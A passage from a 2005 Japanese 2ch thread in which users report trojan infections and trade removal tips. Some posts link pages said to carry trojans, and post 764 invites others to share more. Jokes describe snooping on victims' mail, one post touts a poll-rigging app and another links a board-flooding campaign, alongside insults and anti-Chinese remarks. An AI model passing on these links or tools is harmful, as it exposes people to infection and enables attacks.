678 ：名無しさん＠お腹いっぱい。 ：05/02/25 04:09:24: (´･ω･`) 知らんがな
679 ：名無しさん＠お腹いっぱい。 ：05/02/25 04:21:53: ((´´･･ω･･`)）ししららんんががなな
680 ：名無しさん＠お腹いっぱい。 ：05/02/25 14:23:00: 誰かトロイ対策ソフト（フリー）格付けやってよ
681 ：名無しさん＠お腹いっぱい。 ：05/02/25 17:18:36: >>680

アンチウイルス系の定義ファイルをまめに更新する。
↑で対応しきれないトロイは、FW+砂箱で対応するしか他に方法はない。
フリーの砂箱は
　・SSM：　今はフリーだが、安定動作するようになったらシェアになるとか。
　・Process Guard：　機能限定でフリー版があるが、どの程度のものか分からない。

SSMは入門レベルの砂箱だが↓のテストトロイは全てブロックできる。
http://www.firewallleaktester.com/tests.htm
682 ：名無しさん＠お腹いっぱい。 ：05/02/25 17:24:09: ↑修正

×SSMは入門レベルの砂箱だが↓のテストトロイは全てブロックできる。

○SSMは入門レベルの砂箱だがFWと併用すると↓のテストトロイは全てブロックできる。
683 ：名無しさん＠お腹いっぱい。 ：05/02/25 17:36:30: 砂箱？
684 ：名無しさん＠お腹いっぱい。 ：05/02/25 22:06:31: Process GuardのLeakTestの成績をみたいよな。
誰かデータ持ってたらきぼんぬ。
685 ：名無しさん＠お腹いっぱい。 ：05/02/26 00:47:41: 砂箱？？
686 ：670 ：05/02/26 01:22:54: >>671 >>672
レス遅くなりましたが、ファイル削除しました。
WMPも何事も無く立ち上がりました。
どうもありがとうございます。
687 ：名無しさん＠お腹いっぱい。 ：05/02/26 01:32:06: ProcessGuardの割れをみつけたがクラックEXEだから使う気にならん。
そんなの使ってレポート書くなよ。信用できないから。
688 ：名無しさん＠お腹いっぱい。 ：05/02/26 14:32:32: >>685
【sandbox】砂場、砂箱
保護された領域内でのみプログラムを動作させて安全を確保している。
もし、砂場（保護された領域内）から安全でない領域への動きがあれば
ユーザに許可を求めたり、または遮断することなどが可能。
689 ：名無しさん＠お腹いっぱい。 ：05/02/27 14:32:56: トレンドマイクロオンラインスキャンというのをやったらTROJ_～などが出
てきてしまいました・・・
PC初心者なのでどうしたらいいのやらなんです。
なにか対処方法を教えていただけませんか？
690 ：名無しさん＠お腹いっぱい。 ：05/02/27 14:43:02: トロイの木馬系ウィルスにはMcAfeeが一番いいらしい。
漏れも念のためPestpatrol、Ad-Aware、Spybot入れてるが、McAfeeがリアルタイムで弾いてくれる。
691 ：名無しさん＠お腹いっぱい。 ：05/02/27 15:20:28: >>689
同じ経験あるけど、再起動時に削除する、みたいな感じで普通に削除してくれた。
692 ：名無しさん＠お腹いっぱい。 ：05/02/27 15:41:55: PC初心者なら全然気にしないでいいですよ
693 ：名無しさん＠お腹いっぱい。 ：05/02/27 17:29:22: u-m
694 ：名無しさん＠お腹いっぱい。 ：05/02/27 18:04:44: わかりました、McAfeeというのを試してみます。
ありがとうございましたｗ
695 ：名無しさん＠お腹いっぱい。 ：05/02/27 19:25:03: もしもし。どーも。
なんか最近トロイがよくいらっしゃるんだけど。
ノートンで遮断されるからいいけど、何故だ？
696 ：名無しさん＠お腹いっぱい。 ：05/02/27 20:22:33: 初心者ユーザを脅しておけば、次からもノートンを買ってくれるだろうと言う
ノートンのオオカミ少年的営業方針なんだから、
何も心配することはないと言うのが一般的な常識になっている。
分かり易く言えば、トロイに感染していない限りまったく問題ない。

ただ、実際トロイに感染していたら警告はでないだろうからな、困ったもんだ。
697 ：名無しさん＠お腹いっぱい。 ：05/02/28 21:41:41: TheCleanerってのは、あんま人気ないのかな。。
http://www.moosoft.com/
30日間お試し。
2005年2月24日のデータだと、20912のトロイに対応。
698 ：名無しさん＠お腹いっぱい。 ：05/03/01 02:17:32: >>690
マカフィは便利だよな
たまにエロサイト見てるとトロイの木馬に引っかかるが
自動的に駆除してくれる。
699 ：名無しさん＠お腹いっぱい。 ：05/03/01 02:58:43: マカフィってフリーでウイルススキャンするのにも
何か登録手続き求められるだろ？登録したら、あとあとウザくない？
700 ：名無しさん＠お腹いっぱい。 ：05/03/03 20:46:31: やっぱり困っています・・・。
トロイの木馬の　TOROJ_SECONDT.A に感染してどうしようもないのです。
どなたか駆除方法教えてください。
701 ：i219-167-234-36.s02.a003.ap.plala.or.jp ：05/03/03 21:22:14: >>700
日本、』イギリス、アメリカの、どのサイトでも
その「文字列」は、検索不可だった。

新種？　　ネタ？
702 ：名無しさん＠お腹いっぱい。 ：05/03/04 04:29:55: >>700
よく嫁
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SECONDT.A
703 ：名無しさん＠お腹いっぱい。 ：05/03/04 05:56:18: どうやら、TROJ STARTPAG.QA　というトロイに感染したらしいです。MJEC.DLLというフォルダがありました。
と、同時にabout.blankというスパイウェアにも感染してしまいました
ウイルスバスターで前者は発見できましたが隔離できませんでした。ぐぐってみても検索結果０件です。

トレンドマイクロのホームページにもまだ情報が載っていません。
どうしたらいいのでしょうか。破壊活動は着々と進んでいるようです。

リカバリするか、トレンドマイクロの対応を待った方がいいのでしょうか
704 ：名無しさん＠お腹いっぱい。 ：05/03/04 06:10:50: Win32.Startpage.E

TROJ_STARTPAGE.Q(Trend)

スペル確認してみて。ぐぐったら出てきた。
当方初心者なので力にはなれない。
705 ：７０３ ：05/03/04 06:42:27: 確認してみましたが、確かに　TROJ _STARTPAG.QA　　でした。

いまみたらかなり破壊活動が進んでました・・・
706 ：名無しさん＠お腹いっぱい。 ：05/03/04 06:44:43: 駆除できそうか？
早く上級者が来ればいいな。
707 ：名無しさん＠お腹いっぱい。 ：05/03/04 07:34:39: 最近どうでもいいスパイウェアの定義にひっかかる奴が多すぎて
答える気にもならんというのが本音。
708 ：名無しさん＠お腹いっぱい。 ：05/03/04 18:08:54: 感染ファイルの属性を外して捨てるのみ

わしはいつもそうしているし・・・
709 ：名無しさん＠お腹いっぱい。 ：05/03/04 19:56:23: NetBus トロイの木馬のデフォルト遮断が一致
リモートアドレス (221.154.231.231、4360)

入検知が NetBus トロイの木馬のデフォルト遮断
トロイの木馬を検出して遮断しました。
221.154.231.231 とのすべての通信は
710 ：名無しさん＠お腹いっぱい。 ：05/03/04 19:58:53: ノートン入れていて、よくトロイ警告がでるんだけど
ネットに接続してるだけでも、侵入してくるの？
711 ：名無しさん＠お腹いっぱい。 ：05/03/04 20:03:34: FWなければ接続してるだけで感染するでしょ
712 ：名無しさん＠お腹いっぱい。 ：05/03/04 20:50:25: >>711
接続してるだけで感染？

詳しく！！
713 ：名無しさん＠お腹いっぱい。 ：05/03/04 21:30:14: 口を開けたままだと、虫が入ってくる。
714 ：70３ ：05/03/05 09:25:49: >>704,>>706,>>708
ありがとうございます。
これから属性の外し方を勉強してさっそく実行してみます！！

TROJ STARTPAG.QA　をウイルスバスターでせっかく隔離できたのに、また復活してました。しかも
TROJ STARTPAG.ET　という新種まで産まれてる始末です。

・・・ウイルスバスタじゃもう駄目か
715 ：名無しさん＠お腹いっぱい。 ：05/03/05 10:22:32: >>714
なんだあ　復活するようになったら、エロ助サイト行き
復活のロジックを勉強して来い
716 ：名無しさん＠お腹いっぱい。 ：05/03/06 13:27:15: TROJ_ STARTPAG.QA というトロイにやられました。ウィルスバスターが発見してくれましたが、駆除はできない模様。トレンドマイクロのHP見ても、最新ウィルスのようで、対策法は全て英語かつ素人には難解そうな内容。どうしたらいいのか、どなたか教えて頂けないでしょうか？
717 ：名無しさん＠お腹いっぱい。 ：05/03/06 16:04:31: ヒロシです…
ノティファイがローカルアドレスだらけだとです…

ヒロシです…
XPに接続できません…

ヒロシです…
Hiroshi-Devil…言ってみただけとです…

ヒロシです…ヒロシです…
718 ：名無しさん＠お腹いっぱい。 ：05/03/06 17:18:35: 　　　　　　　　　　　__,,,,,,
─────　　 ,.-'''"-─ `ー,--─'''''''''''i-､,,　　　　　　　　　　 .'　　，　．. ∧＿∧
────　　,.-,/　　　　　　 /::::::::::::::::::::::!,,　　＼　　　　　.∴　'　　　　　（>>717 ）
────　（　 ,'　　　　　 i:::::::::::::::::::::;ﾉ　ヽ-､,,/''ー'''"7',　・,‘　ｒ⌒>　 _／／
￣￣￣￣　　`''|　　　　　 |:::::::::::::::::::::}　　　　　｀`ー''". 　　’ |　ｙ'⌒　　⌒i 　ｶﾞｯ
───── 　 !　　　　　　　'､:::::::::::::::::::i　　　　　　　　　　　　　 |　　／　　ノ｜
＿＿＿＿＿＿_ '､　`-=''''フ'ー''ヽ、::::::::::/ヽ､-─-､,,-'''ヽ　　　　, ー' 　／´ヾ_ﾉ
─────── ＼＿／　　　　ヽ--く　　 _,,,..--┴-､ヽ　／　,　　ノ
　　　　　　　　　　　　　　　　　　　　　　　｀`"　　　　　　＼>' 　／／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／　,'
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／| 　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　!､＿／ / 　〉
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|_／
719 ：名無しさん＠お腹いっぱい。 ：05/03/06 21:21:50: >>717
ﾜﾗﾀ
720 ：名無しさん＠お腹いっぱい。 ：05/03/07 12:14:40: 昨日雑談系２のぞいた瞬間
ノトーン反応したから、また誤爆反応かと思いきや
修復しねぇ消去しねぇときたから、調べてみたら
Backdoor.Nibu.D とかいうやつに感染してたorz
感染場所がギコナビフォルダなので
ギコナビアインスコして、2種スキンしたら
発見されなかったんだけど、大丈夫ってことでO
ｋ？
721 ：名無しさん＠お腹いっぱい。 ：05/03/07 12:56:55: ノートンは２ちゃんのログにも反応する
722 ：名無しさん＠お腹いっぱい。 ：05/03/07 14:07:30: ログフォルダは除外しろとあれほど
723 ：名無しさん＠お腹いっぱい。 ：05/03/07 20:16:41: ﾜﾗﾀ
724 ：名無しさん＠お腹いっぱい。 ：05/03/07 20:43:50: ヒロシです…
victimがゲームしかしないとです…

ヒロシです…
メール覗いたらバリバリの左翼だったとです…

ヒロシです…
「やっほぉ♪」って送ったら「あ？殺すぞ？」って返ってきたとです…

ヒロシです…ヒロシです…
725 ：名無しさん＠お腹いっぱい。 ：05/03/07 20:58:07: 　　　　　　　　　∧＿∧ 　　
　　　　　　　　_（　´_ゝ｀）
　　　　　　／　　　　　　）　　　　　　　　　　　＿　　　　　_
　　　　　/　.イ　、　　ノ/　　　　∧ ∧―＝￣　｀ヽ.　＿
　　　　/　/　|　　　（〈　∵. ・（　　〈＿_　>　　゛>>724、＿―
　　　｜　!　ヽ　　ー＝-￣￣＝_、　　（／　.　´ノ
　　　｜ |　　　｀iー＿＿＝―＿　;.　／　／／　　
　　　 !、リ　　-=＿二＿＿￣_=;.　／　／　.'
　　　　　　　　/　 /　　　　　　　／　／| 　|
　　　　　　／　 /　　　　　　　!、＿／ / 　〉
　　　　　／＿/　　　　　　　　　　　　 |_／
　　　　　ヽ、＿ヽ
726 ：名無しさん＠お腹いっぱい。 ：05/03/07 21:07:21: >>724
ﾜﾗﾀ
727 ：名無しさん＠お腹いっぱい。 ：05/03/07 22:55:15: Trojan. StartPageってのに感染してたよ(;´Д`)
tempの中にあったse.dllってのが感染してたみたい。
about:blank でsearch forというページにスタートアップ時のHPを固定しやがる
とりあえずトロイは脳豚で消したがスパイウェアが消えねぇー
728 ：名無しさん＠お腹いっぱい。 ：05/03/07 22:58:14: うるせー馬鹿
729 ：名無しさん＠お腹いっぱい。 ：05/03/10 02:57:43: Trojan. StartPage.16.Mというのに感染した。
ネットの先頭がＳｅｒｃｈ　ｆｏｒに変えられる。スパイウェアを駆除した後、ＡＶＧでトロイも消したが、
ここ三日ほど何度となく感染している。ウィンドウズ起動時に一瞬何かのウィンドウが開きすぐ消えるのだが
このトロイについての詳細キボン。
730 ：名無しさん＠お腹いっぱい。 ：05/03/10 03:44:28: 何よその情報の少なさは
ふざけてるの？
731 ：名無しさん＠お腹いっぱい。 ：05/03/10 05:46:50: なんだと
732 ：名無しさん＠お腹いっぱい。 ：05/03/11 14:53:35: ((((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
733 ：教えてください ：05/03/12 13:20:31: c\restore\temp\にA000???.CPYというファイルがいくつもあり、PWSteal.Trojanというウイルスに感染しています、とノートンが警告してきました。
ノートンでは対応できず、「システムの復元のチェック」で削除するのですが、再起動するとまたあらわれます。
レジストリに関係あるのかもしれませんが、くわしくはわかりません。
削除する方法をおしえていただけないでしょうか？宜しくお願いします。
734 ：名無しさん＠お腹いっぱい。 ：05/03/12 13:31:12: >>733
こういうページがすぐに見つかるんだが、ここに書き込む前にたどり着けないか？
http://www.symantec.com/region/jp/avcenter/venc/data/pwsteal.trojan.html

それらをやってみて分からないところがあったら具体的に書いて初めて誰かに尋ねてみる。
質問があってもみんなスルーされるのはそういう調査手順もなしに助けてとだけ言うからだと思う。
735 ：名無しさん＠お腹いっぱい。 ：05/03/12 14:45:38: >>729

漏れもタスクバーに何か出るが今は問題なし。
ウイルスなのか？
736 ：名無しさん＠お腹いっぱい。 ：05/03/12 21:13:31: >>727
WINDOWS\SYSTEMフォルダに lhnngaa.dll がありませんか？
lhnngaa.dllを削除すると、se.dllが復活しなくなった。
lhnngaa.dllが何なのか判らんし、削除して、他に影響があるかどうかはわかりませんが。
737 ：名無しさん＠お腹いっぱい。 ：05/03/13 09:11:58: >>727
about:blankについてはこちらでチェックしてみるといいですよ。
http://www.higaitaisaku.com/removeaboutblank.html
738 ：名無しさん＠お腹いっぱい。 ：05/03/13 16:24:45: >>727
hijack thisのログを送っていだくとチェックできるかもしれません。
http://www.higaitaisaku.com/hijackthis.html
739 ：名無しさん＠お腹いっぱい。 ：05/03/14 02:10:46: ヒロシです…
メール覗いたらサポートに「ナリ対策とか教えて」とか送ってるとです…

ヒロシです…
よくみると五分後に「頼むから返事してよ」とか送ってるとです…

ヒロシです…
厨の溜まり場では一つの罠に十人もひっかかるとです…

ヒロシです…
その十人中十人にMXがインストールされてるとです…

ヒロシです…ヒロシです…
740 ：名無しさん＠お腹いっぱい。 ：05/03/16 20:45:22: ~e5.0001
741 ：名無しさん＠お腹いっぱい。 ：05/03/17 16:20:41: trojans spyware include file
[フォルダ名]C:\ProgramFiles\Spybot-Search&Destroy\Includes

ファイル検索で「trojan」で検索したら上記のファイルが２つ出てきました。
削除しないとまずいですか？
742 ：741 ：05/03/17 16:57:53: どなたかお答え願えませんでしょうか。
743 ：名無しさん＠お腹いっぱい。 ：05/03/17 17:02:33: >>741
ファイル検索って何の検索？　
Spybot? WindowsのExplorer?
744 ：741 ：05/03/17 17:08:59: >743
スタートメニューにある検索です。
他板に貼られていたneverenjoykoreaの掲示板のアドレスを踏んだ後、
スレの流れで「トロイだ」と書かれていました。
ウィルス反応がありませんでした。
おそらく対策をしていないからなのだと思います。
745 ：名無しさん＠お腹いっぱい。 ：05/03/17 17:13:36: >>744
トロイで自分でtrojanと名乗るファイルもなかろう。Spybotの中のファイルでしょ。
名前で検索しても無意味。対策ソフトでスキャンして判断してくれよ。
対策ソフトはこの板で探してね。
746 ：名無しさん＠お腹いっぱい。 ：05/03/17 17:15:19: >745
わかりました。
もし感染していない場合でも、このファイル名が出てくる事は有り得るのですか？
747 ：741=746 ：05/03/17 17:16:41: 名前欄忘れました。すみません。
>741=746です
748 ：名無しさん＠お腹いっぱい。 ：05/03/18 11:47:19: GenericDownloader.n
W32/Sdbot.worm.gen
W32/Sdbot.worm.gen.j
W32/Sdbot.worm.gen.g
QLowZones-3

プレインスコされてたマカフィーのやつでスキャンしたらこいつらが見つかったのですが、駆除しようとしてもエラーになってしまいす。
どのように対処すればよいのでしょうか？
749 ：名無しさん＠お腹いっぱい。 ：05/03/18 11:58:03: >>748
だめだあ　それ
Temporary Internet Files以外から発見されたのなら、
他にもスキャンしても引っかからないものも
きっとインストールされている
リカバリーでもすれば？
750 ：名無しさん＠お腹いっぱい。 ：05/03/18 12:05:11: >>449
ヘタレの自分には意味が理解できていないのですが、何をしてももうだめって事でしょうか？

とりあえず当てもないのでsymantec security checkしています。
751 ：750 ：05/03/18 12:57:08: 77820 個のファイルをスキャンしたところ、 15 ハードディスク上のファイルが感染していました。

メモリ上でウィルスは見つかりませんでした。

C:\WINDOWS\system32\paydial.exe は　Backdoor.Tofger に感染しています。
C:\RECYCLER\S-1-5-21-963639892-2690133624-1694720459-1003\Dc1.exe は　Dialer.WSV に感染しています。
C:\Program Files\Live2ch\log\tmp4.2ch.net\download\1101842404.dat は　VBS.Internal に感染しています。
C:\Program Files\Live2ch\log\sports7.2ch.net\sports\subject.txt は　Bloodhound.Exploit.6 に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livetbs\1107746316.dat は　Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livetbs\1107747481.dat は　Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livecx\1109716837.dat は　Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live16.2ch.net\liventv\1109078839.dat は　Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\game10.2ch.net\gameover\1107134318.dat は　Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\sports\Folder.idx は　Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\sports\subject.txt は　Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\subject.txt は　Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1110897104.dat は　VBS.Freelink.B に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1110978208.dat は　VBS.Freelink.B に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1111053680.dat は　VBS.Network.E に感染しています。

こんなんでましたけどかなり重症？
752 ：名無しさん＠お腹いっぱい。 ：05/03/18 13:15:33: >>751
>C:\WINDOWS\system32\paydial.exe は　Backdoor.Tofger に感染しています。
>C:\RECYCLER\S-1-5-21-963639892-2690133624-1694720459-1003\Dc1.exe は　Dialer.WSV に感染しています。

ログファイルは実行されないからどうでもいいんだけど、
この２つは名前からしてダイヤラーかな
削除するには、セーフモードでスキャンしないときっと無理だろう
ttp://www.bbs.bun-chan.net/srec87.html
参考にでもなるのかな？
753 ：名無しさん ：05/03/20 06:15:32: 結構昔のPC使ってんだけど
トロイに感染したら何かへんかあるの？
ちなみに９８SE
754 ：名無しさん＠お腹いっぱい。 ：05/03/20 09:41:26: 気付かないうちにDDos攻撃の部隊に参加してるかもな
755 ：名無しさん＠お腹いっぱい。 ：2005/03/21(月) 10:10:53: >>753
犯罪の踏み台にされて、ある日に突然、警察がＰＣと君を連れて行くかもね？
756 ：名無しさん＠お腹いっぱい。 ：2005/03/24(木) 20:35:13: >>753
君はトロイ！
757 ：名無しさん＠お腹いっぱい。 ：2005/03/24(木) 23:42:36: >>756
しょうがないから座布団１枚
758 ：名無しさん＠お腹いっぱい。 ：2005/03/31(木) 19:36:24: 昨日の夜からトロイらしいウイルスと格闘すること20時間・・・ewidoでスキャンすると55個、感染。
ウイルスバスターのFWの除外設定を勝手変えられ、ヤフーのアカウントは乗っ取られ、パスも変えられ。
ヤフー昨日取ったばっかなのにさ('A`)・・・。バスターでなんでウイルス出てこないのか、考える事20時間
MX用にポート開放してたから、そこから侵入→トロイ→('A`)・・・。
もうMXなんかしないと、思わせてくれた長い一日でした。
759 ：名無しさん＠お腹いっぱい。 ：皇紀2665/04/01(金) 16:32:33: FW入れてねーのか？
プロセスがMXの場合のみ許可ってしてれば良いだけじゃね？
760 ：名無しさん＠お腹いっぱい。 ：皇紀2665/04/01(金) 16:37:14: >>623
おまえは何をやっても無駄
だまって死んどけ　ムシケラカス
761 ：名無しさん＠お腹いっぱい。 ：皇紀2665/04/01(金) 21:31:10: >>760
遅ぇよ（笑）
762 ：名無しさん＠お腹いっぱい。 ：皇紀2665/04/01(金) 22:29:25: >>760
ヒマなヤロ
763 ：名無しさん＠お腹いっぱい。 ：皇紀2665/04/01(金) 23:33:42: >>760
三ヶ月前のレスへ
何がそんなに気に障ったのかw
764 ：名無しさん＠お腹いっぱい。 ：2005/04/02(土) 04:14:08: つーかみんなが今までに踏んじゃったトロイのアド出そう！
誰がなんと言おうと貼っちゃってね(^_-)-☆
ttp://69.50.161.142/inc/nan7.html

オレはこれ踏んでからなんも対処してないぜｂ
765 ：名無しさん＠お腹いっぱい。 ：2005/04/10(日) 10:51:54: >>764
トロイにはきちんと対処してもらわないと、あなたやあなたの友達だけじゃなく
世の中の人全般が迷惑するんですけど。
（あなたのパソコンが犯罪の踏み台にされるから）
766 ：名無しさん＠お腹いっぱい。 ：2005/04/11(月) 00:15:36: >>740
の書き込みは何の意味？
767 ：名無しさん＠お腹いっぱい。 ：2005/04/11(月) 00:36:39: ttp://virus.org.ua/unix/woid.jpg

↑このリンク先にあるトロイに昨日感染しました
どなたか駆除方法を教えていただけませんか？
いちよう自分でewidoというソフトをDLして削除してるのですが
その後少ししてewidoでスキャンするとまた感染ファイルが見つかってキリがないです…
他の板でも質問したのですがいちようこちらでも質問します
XPのceleronを使っています
768 ：名無しさん＠お腹いっぱい。 ：2005/04/11(月) 01:03:55: > このリンク先にあるトロイ
トロイの名称を書けよ。お前のためにわざわざアクセスするととこから
始めないといけないのか

> 他の板でも質問したのですがいちようこちらでも
それを人はマルチポストと呼ぶ
769 ：名無しさん＠お腹いっぱい。 ：2005/04/11(月) 10:14:35: 私は、ふだんは、ノートンを常駐させています。

昨日初めてa2を使ってみました　3つ検出されました
その次にewidoを使ってみました　何十個も検出されました（ewidoも昨日初めて使いました）

検出力が違うのかなあ。
それとも、駆除する必要のない物まで、ewidoは駆除しているのかなあ
770 ：名無しさん＠お腹いっぱい。 ：2005/04/11(月) 14:33:06: >>767
おいおい、スレ開いたらいきなりバスターが動いたぞｗ
駆除できたからいいけど、むやみに貼るなよ・・・
771 ：名無しさん＠お腹いっぱい。 ：2005/04/13(水) 00:00:01: 今日はじめてトロイに感染したんですが、このままほっといて急に
多額の請求が来ることってありえるんでしょうか・・？
772 ：名無しさん＠お腹いっぱい。 ：2005/04/13(水) 11:20:15: >>771
可能性としては、あり得る

一切トロイに感染しなくても、あり得るし。
773 ：名無しさん＠お腹いっぱい。 ：2005/04/13(水) 13:18:07: >>771
可能性論を言うと、クレジットカード番号盗まれて多額の請求が来たり
大学の単位履修のログイン情報盗まれて今年の取得単位が0になったり
踏み台にされて警察にマシン押収されたりするかもしれない

とりあえず感染してると分かったならほっとかない方がいいとは思うよ
774 ：名無しさん＠お腹いっぱい。 ：2005/04/13(水) 18:04:43: >>770
むやみにクリックするなよ。
2チャンだぞここはｗｗｗ
775 ：名無しさん＠お腹いっぱい。 ：2005/04/14(木) 12:24:53: こういうウイルスとかってリストアしてもダメなんでしょうか？
776 ：名無しさん＠お腹いっぱい。 ：2005/04/14(木) 15:04:12: >>775
あなたがリストアという言葉をどれだけ正確に使っているかもわからないし、
その質問には答えにくい。
777 ：名無しさん＠お腹いっぱい。 ：2005/04/14(木) 23:55:47: >>775
ウイルスはさっさとリストラしてしまいなさい
778 ：セキュ初心者 ：2005/04/15(金) 19:41:21: スパイウェアの発見＆削除ってどうするんですか？
クッキーですか？
779 ：名無しさん＠お腹いっぱい。 ：2005/04/15(金) 19:43:32: >>778
君が何を言っているのか僕にはよく分からないが、とりあえずここはトロイスレだ
http://www.google.com/search?hl=ja&q=%E3%82%B9%E3%83%91%E3%82%A4%E3%82%A6%E3%82%A7%E3%82%A2+%E7%99%BA%E8%A6%8B+%E5%89%8A%E9%99%A4&lr=lang_ja
このスレはもちろん他のスレにもしばらく書き込まず検索エンジンで色々やってみろ
780 ：名無しさん＠お腹いっぱい。 ：2005/04/15(金) 23:49:23: スタートページMがノートンで検出されたが削除できず、
a2では検出さえされない、、、
781 ：名無しさん＠お腹いっぱい。 ：2005/04/16(土) 09:32:29: >>780
そういう時は、俺はこれを試してるよ

ewido【Trojan Horsesが気になる貴方に】
http://pc8.2ch.net/test/read.cgi/sec/1098285373/
スパイウェア削除ソフトSpybot 20
http://pc8.2ch.net/test/read.cgi/sec/1109267389/
スパイウェア削除ソフトAd-awareSE　その20
http://pc8.2ch.net/test/read.cgi/sec/1111726744/
782 ：名無しさん＠お腹いっぱい。 ：2005/04/16(土) 22:09:27: ＞７８１

わざわざすいません、、、、さっそく試してみます
783 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 01:01:38: 昨日の朝トロイの木馬の一種に感染してしまいました。
〟PWSteal.Lemir.H〝という名前でシマンテックで検索したら、
Legend of Mir 2 オンラインゲームのパスワードを盗み取ろうとするトロイの木馬プログラム
という事が分かったのですがノートンアンチウイルスでは発見は出来て、
削除出来ませんと出て、困っています。
ご存知の方、アドバイスお願い出来ないでしょうか、お願いします。
784 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 02:19:08: http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-pwsteal.lemir.h.html
このページを見たんだよな？実際試した訳じゃないから何とも言えないけど
読む限り、この方法通りやれば駆除できると思うけど
785 ：782 ：2005/04/17(日) 03:18:59: >781
ewidoで駆除できました！！マジで助かりました！！

しかしノートンってなんなんだろうか。値段が高くて中途半端で
スキャンも遅くて７８４のシマンテックの案内どうりにやっても駄目で（しかも
指示語が嘘）
786 ：783 ：2005/04/17(日) 08:22:21: >>784
そのページを見て一通りやってみました。
ただ、削除出来ないファイルがあるんです。
削除出来たファイルも隔離も不能で、
直接フォルダから削除ツール使って完全削除しました。
ウイルスバスターで検索したら他のトロイも見つかりました。
こっちは隔離出来たので良かったです。
他のソフト入れてみてもう少し粘って駆除出来なかったら
再セットアップします。どうもありがとうございました。
ちなみに Legend of Mir というゲームはやった事ないんですよね。

>>785
試しにewido入れてみます。
駆除おめでとうございます。
787 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 10:41:16: JWordの勝手なインストールを止めよう！

http://www3.ocn.ne.jp/~techu/stop_jword.html

簡単な設定で悪質な自動インストールを防げます
中国人の作ったＩＴテロソフトＪＷｏｒｄを排除しよう！
788 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 11:29:02: アンチJWORDがここでも暴れているのか
そもそもそのリンク先は、「自動」インストールを防ぐサイトじゃないし

JWORDにはたしかに困った点がある。
その事を正確に書けばいいのに、「書かない・書けない」アンチJWORDだらけ
789 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 11:48:22: トロイスレに貼るところがいかにも厨。まあこいつにとってはJWordごときが一番の脅威なんだろうけども。
790 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 11:53:04: あまいら頭の弱い人をあんまりいじめるなよ。
791 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 11:57:59: >>789
>>790
も前ら、えらそなこと放いてセキュリティツールは何入れてるんじゃい？
792 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 12:02:16: せくるちー
793 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 12:12:19: >>789
>>790
も前ら、えらそなこと放いてセキュリティツールは何入れてるんじゃい？
794 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:01:32: セキュリティは心構えが肝心ですね。ツール使えば安心とかそういう問題じゃないんですよ。
795 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:36:49: ウイルスが入っているファイルを知らずに実行した！

1.心構えが肝心な人だが、アンチウイルスは入れてなかった人。
2.心構えは普通の人だが、アンチウイルスを入れていた人。

さて、1と2のどちらがウイルス病原菌に強いのでしょうか？
796 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:42:45: 笑ってしまった。

セキュリティと心構えは表裏一体だ。
スキルのある人は、セキュリティの構築もそれなりのものがある。
797 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:46:02: 本当に心構えが肝心な人ならexeをクリックしないね
798 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:52:35: 一流はexeを消すよ
799 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 15:59:26: IPを記録してストーカーみたいな行為をする
運営人も一部にはいるから串がないと２ちゃんに来ちゃだめだよ。
800 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 16:04:59: 前回（http://edition.cnn.com/POLLSERVER/results/17016.exclude.html）も相手側の物量作戦に惨敗。
まぁ馬鹿馬鹿しいと言わずに１回位勝ってみてもいいんじゃないの？にっぽん。

　　
【今回のCNN投票】
Do you think China's anti-Japanese sentiment is justified? Yes or NO
中国の反日感情は正当化できますか？　Yes or NO
http://edition.cnn.com/2005/WORLD/asiapcf/04/15/china.japan/index.html

投票状況現在NOがやや劣勢！世界は中国を否定する！
http://edition.cnn.com/POLLSERVER/results/17063.exclude.html

>■　超かんたんＣＮＮ自動投票アプリ　■
>今度こそ最終版
>※readme.txtは必ず読んで下さい
>http://www.uploda.org/file/uporg77266.zip

※各所コピペ推奨
801 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 16:10:21: >>800ここは、トロイの木馬の現状とそれを取り巻く状況について語るスレです。
802 ：名無しさん＠お腹いっぱい。 ：2005/04/17(日) 16:12:22: にっき
えいごがなんてかいてあるのかわからないので、
きっと「いたちがいはうざいとおもいますか？」とかいてあるんだろうとおもった
yesにとうひょうした
803 ：名無しさん＠お腹いっぱい。 ：2005/04/19(火) 13:43:11: 【田代砲専用】日本 2ch VS 中国 2ch 【作戦会議所】Part 20

http://pastorale.rdy.jp/test/read.cgi/tashiro/1113824057/
804 ：名無しさん＠お腹いっぱい。 ：2005/04/19(火) 22:21:32: http://cyberdyne-co-ltd.hp.infoseek.co.jp/burakura-11-20.html
ここの№19ってトロイか？
